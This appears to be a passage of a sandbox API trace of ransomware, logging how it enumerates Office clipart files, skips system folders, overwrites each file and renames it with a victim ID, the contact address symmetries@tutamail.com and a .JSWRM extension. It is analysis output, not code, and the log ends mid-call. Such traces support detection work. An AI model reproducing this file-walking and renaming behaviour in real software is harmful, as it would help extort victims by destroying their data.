[0096.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.504] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6842) returned 1 [0096.504] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ab0) returned 0x205850 [0096.504] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ab0, lpOverlapped=0x0) returned 1 [0096.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.506] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ab0, lpOverlapped=0x0) returned 1 [0096.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.506] CloseHandle (hObject=0x314) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0096.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0096.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0096.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x584, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00656_.WMF", cAlternateFileName="")) returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2=".") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="..") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="...") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="windows") returned -1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="recovery") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="perflogs") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="documents and settings") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="system volume information") returned -1 [0096.508] lstrcmpiW (lpString1="SO00656_.WMF", lpString2="msocache") returned 1 [0096.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00656_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00656_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00656_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00656_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00656_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00656_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0096.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.584] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1412) returned 1 [0096.584] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x580) returned 0x2332c0 [0096.609] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x580, lpOverlapped=0x0) returned 1 [0096.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.678] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x580, lpOverlapped=0x0) returned 1 [0096.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0096.678] CloseHandle (hObject=0x314) returned 1 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0096.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0096.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0096.680] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1652, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00668_.WMF", cAlternateFileName="")) returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2=".") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="..") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="...") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="windows") returned -1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="recovery") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="perflogs") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="documents and settings") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="system volume information") returned -1 [0096.680] lstrcmpiW (lpString1="SO00668_.WMF", lpString2="msocache") returned 1 [0096.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00668_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0096.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00668_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0096.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0096.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.681] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5714) returned 1 [0096.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1650) returned 0x205850 [0096.681] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1650, lpOverlapped=0x0) returned 1 [0096.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.683] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1650, lpOverlapped=0x0) returned 1 [0096.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.683] CloseHandle (hObject=0x314) returned 1 [0096.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0096.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0096.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0096.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0096.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0096.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.684] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0096.685] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00670_.WMF", cAlternateFileName="")) returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2=".") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="..") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="...") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="windows") returned -1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="recovery") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="perflogs") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="documents and settings") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="system volume information") returned -1 [0096.685] lstrcmpiW (lpString1="SO00670_.WMF", lpString2="msocache") returned 1 [0096.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00670_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00670_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00670_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00670_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00670_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00670_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0096.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0096.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.686] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5824) returned 1 [0096.686] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16c0) returned 0x205850 [0096.686] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16c0, lpOverlapped=0x0) returned 1 [0096.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.688] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16c0, lpOverlapped=0x0) returned 1 [0096.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.688] CloseHandle (hObject=0x314) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 